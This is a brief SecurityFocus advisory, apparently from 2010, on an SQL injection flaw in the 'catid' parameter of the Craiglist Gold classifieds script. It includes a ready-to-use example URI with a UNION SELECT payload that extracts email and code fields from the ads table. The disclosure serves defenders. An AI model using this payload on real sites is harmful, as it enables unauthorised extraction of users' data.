Craiglist Gold 'catid' Parameter SQL Injection Vulnerability

An attacker can exploit the issue using a browser.

The following example URI is available:

http://www.example.com/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--


 

Privacy Statement
Copyright 2010, SecurityFocus